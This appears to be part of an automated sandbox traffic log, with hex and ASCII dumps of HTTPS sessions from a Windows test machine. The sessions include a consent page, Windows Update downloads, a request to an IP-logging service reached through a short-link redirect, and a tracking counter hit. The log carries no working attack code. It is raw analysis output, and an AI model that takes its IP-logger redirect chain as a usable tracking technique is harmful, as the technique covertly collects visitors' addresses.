                                                                            2024-07-29 22:56:49 UTC1369INData Raw: 65 3a 32 38 70 78 3b 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0a 09 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 63 6f 6e 74 65 6e 74 20 7b 0d 09 70 61 64 64 69 6e 67 3a 20 35 70 78 20 30 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 31 70 78 3b 0a 09 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 0a 7d 0a 2e 68 61 6e 64 73 68 61 6b 65 20 7b 0a 7d 0a 2e 68 61 6e 64 73 68 61 6b 65 20 3e 20 69 6d 67 20 7b 0a 09 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 09 62 6f 72
                                                                            Data Ascii: e:28px;font-style:normal;font-weight:bold;color:#333333;text-align: center;}.content {padding: 5px 0px;margin:0;line-height:21px;color:#333333;font-size:14px;text-align:justify}.handshake {}.handshake > img {display:block;bor
                                                                            2024-07-29 22:56:49 UTC1369INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 29 2c 0a 0a 7d 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 20 7b 0d 09 70 2c 20 75 6c 20 6c 69 2c 20 6f 6c 20 6c 69 2c 20 61 20 7b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 25 21 69 6d 70 6f 72 74 61 6e 74 20 7d 0a 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 31 20 61 2c 20 68 32 20 61 2c 20 68 33 20 61 20 7b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 30 25 20 7d 0a 09 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 20 7d 0a 09 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a
                                                                            Data Ascii: only screen and (max-height: 600px),}@media only screen and (max-width:600px) {p, ul li, ol li, a { line-height:150%!important }h1, h2, h3, h1 a, h2 a, h3 a { line-height:120% }h1 { font-size:42px!important; text-align:center }h2 { font-size:
                                                                            2024-07-29 22:56:49 UTC1369INData Raw: 75 62 6d 69 74 22 3e 0a 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6b 65 79 22 20 76 61 6c 75 65 3d 22 75 6e 69 6b 65 79 5f 35 31 65 66 66 39 33 37 37 30 34 36 32 61 31 31 31 31 62 37 62 33 35 64 30 62 62 61 35 65 39 39 36 66 30 66 61 34 30 31 38 36 39 30 63 30 65 62 39 61 64 32 63 36 61 30 34 38 62 30 63 61 37 65 22 3e 0a 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6f 6b 22 20 6e 61 6d 65 3d 22 63 6f 6e 73 65 6e 74 22 20 76 61 6c 75 65 3d 22 31 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 41 67 72 65 65 20 26 20 43 6f 6e 74 69 6e 75 65 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c
                                                                            Data Ascii: ubmit"><form action="" method="POST"><input type="hidden" name="key" value="unikey_51eff93770462a1111b7b35d0bba5e996f0fa4018690c0eb9ad2c6a048b0ca7e"><button class="ok" name="consent" value="1" type="submit">Agree & Continue</button><div cl
                                                                            2024-07-29 22:56:49 UTC51INData Raw: 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: .body.appendChild(a);</script></body></html>
                                                                            2024-07-29 22:56:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.64973020.12.23.50443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:50 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sh9hBMxfPmon+V7&MD=w1bAu+gC HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                            Host: slscr.update.microsoft.com
                                                                            2024-07-29 22:56:50 UTC560INHTTP/1.1 200 OK
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Content-Type: application/octet-stream
                                                                            Expires: -1
                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                            MS-CorrelationId: 11a09548-bc4e-4568-b3a1-3b3efcd7ea3b
                                                                            MS-RequestId: 36432757-a08f-4d7e-9ea4-849ab05674ea
                                                                            MS-CV: 2BFOp1gb4Ua6ufl7.0
                                                                            X-Microsoft-SLSClientCache: 2880
                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                            X-Content-Type-Options: nosniff
                                                                            Date: Mon, 29 Jul 2024 22:56:49 GMT
                                                                            Connection: close
                                                                            Content-Length: 24490
                                                                            2024-07-29 22:56:50 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                            2024-07-29 22:56:50 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.649732172.67.132.1134433136C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:50 UTC588OUTGET /redirect/handshake.png HTTP/1.1
                                                                            Host: cdn.iplogger.org
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://2no.co/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:50 UTC1285INHTTP/1.1 403 Forbidden
                                                                            Date: Mon, 29 Jul 2024 22:56:50 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                            Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Resource-Policy: same-origin
                                                                            Origin-Agent-Cluster: ?1
                                                                            Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                            Referrer-Policy: same-origin
                                                                            X-Content-Options: nosniff
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            cf-mitigated: challenge
                                                                            2024-07-29 22:56:50 UTC691INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6e 37 2f 72 71 73 70 50 48 44 33 72 4f 79 55 64 44 75 42 70 39 5a 4f 74 6b 48 38 63 6d 45 49 4d 30 6f 71 61 57 30 57 33 76 68 46 35 65 6b 70 49 73 38 62 6f 46 36 50 38 6f 36 48 31 68 57 4c 73 79 30 7a 65 4d 43 4c 62 62 2b 41 62 59 7a 4a 58 53 69 6d 49 7a 6b 54 49 56 2f 72 61 57 43 62 49 38 34 64 37 6f 61 30 42 66 69 67 3d 24 34 4a 37 6e 61 51 77 57 59 56 4a 70 75 34 54 71 69 6d 35 69 5a 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                            Data Ascii: cf-chl-out: n7/rqspPHD3rOyUdDuBp9ZOtkH8cmEIM0oqaW0W3vhF5ekpIs8boF6P8o6H1hWLsy0zeMCLbb+AbYzJXSimIzkTIV/raWCbI84d7oa0Bfig=$4J7naQwWYVJpu4Tqim5iZg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                            2024-07-29 22:56:50 UTC1369INData Raw: 33 65 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                            Data Ascii: 3efd<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                            2024-07-29 22:56:50 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                                                            Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                                                            2024-07-29 22:56:50 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                            Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                                                            2024-07-29 22:56:50 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                                                            Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                                                            2024-07-29 22:56:50 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                                                            Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                                                            2024-07-29 22:56:50 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                                                            Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                                                            2024-07-29 22:56:50 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                                                            Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                                                            2024-07-29 22:56:50 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 38 35 33 33 32 27 2c 63 52 61 79 3a 20 27 38 61 62 30 62 34 35 61 36 61 32 36 34 31 61 66 27 2c 63 48 61 73 68 3a 20 27 33 63 33 39 65 31 66 30 33 31 30 35 64 36 30 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 72 65 64 69 72 65 63 74 5c 2f 68 61 6e 64 73 68 61 6b 65 2e 70 6e 67 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 47 66 78 4e 41 45 42 61 44 39 59 4d 34 66 69 66 69 79 78 55 38 37 39 30 70 46 52 4b 71 4b 53 38 57 4e 31 56 64 48 72 53 31 58 30 2d 31 37 32 32 32 39 33 38 31 30 2d 30 2e 30 2e 31 2e
                                                                            Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "cdn.iplogger.org",cType: 'managed',cNounce: '85332',cRay: '8ab0b45a6a2641af',cHash: '3c39e1f03105d60',cUPMDTk: "\/redirect\/handshake.png?__cf_chl_tk=GfxNAEBaD9YM4fifiyxU8790pFRKqKS8WN1VdHrS1X0-1722293810-0.0.1.
                                                                            2024-07-29 22:56:50 UTC1369INData Raw: 34 63 4c 74 49 73 50 72 67 47 76 47 31 52 36 48 39 46 44 63 68 65 7a 39 49 76 78 36 62 74 64 2e 58 48 61 7a 52 55 73 53 74 35 68 41 35 56 78 41 78 64 33 4b 67 76 7a 70 50 35 65 6a 76 55 44 4f 48 50 4f 38 62 4f 39 33 44 66 64 63 35 6e 69 66 56 56 52 57 7a 77 37 6f 34 75 42 35 42 2e 6d 59 34 73 4c 48 65 6d 54 59 38 4d 52 62 6f 33 4d 67 6e 42 71 4d 44 38 7a 79 71 52 4a 51 35 44 73 39 66 69 67 2e 42 32 4e 43 58 69 70 55 47 63 71 69 56 73 36 6d 61 4f 63 70 42 58 68 69 4f 4d 42 7a 52 39 67 48 56 65 6d 77 48 5f 32 59 37 35 78 6e 4a 71 69 31 6e 4f 36 57 58 68 42 77 4e 49 61 63 4a 76 54 4e 5f 50 53 58 65 6c 74 4c 4e 56 67 76 58 45 63 51 50 5a 6a 79 34 45 4d 47 58 52 53 7a 48 48 72 39 53 30 6e 68 2e 4d 30 73 76 6f 4d 70 6e 45 43 6c 41 54 4b 45 70 36 66 65 77 71 47
                                                                            Data Ascii: 4cLtIsPrgGvG1R6H9FDchez9Ivx6btd.XHazRUsSt5hA5VxAxd3KgvzpP5ejvUDOHPO8bO93Dfdc5nifVVRWzw7o4uB5B.mY4sLHemTY8MRbo3MgnBqMD8zyqRJQ5Ds9fig.B2NCXipUGcqiVs6maOcpBXhiOMBzR9gHVemwH_2Y75xnJqi1nO6WXhBwNIacJvTN_PSXeltLNVgvXEcQPZjy4EMGXRSzHHr9S0nh.M0svoMpnEClATKEp6fewqG


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.64973388.212.201.2044433136C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:50 UTC666OUTGET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1
                                                                            Host: counter.yadro.ru
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://2no.co/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:50 UTC603INHTTP/1.1 302 Moved Temporarily
                                                                            Server: nginx/1.17.9
                                                                            Date: Mon, 29 Jul 2024 22:56:50 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 32
                                                                            Connection: close
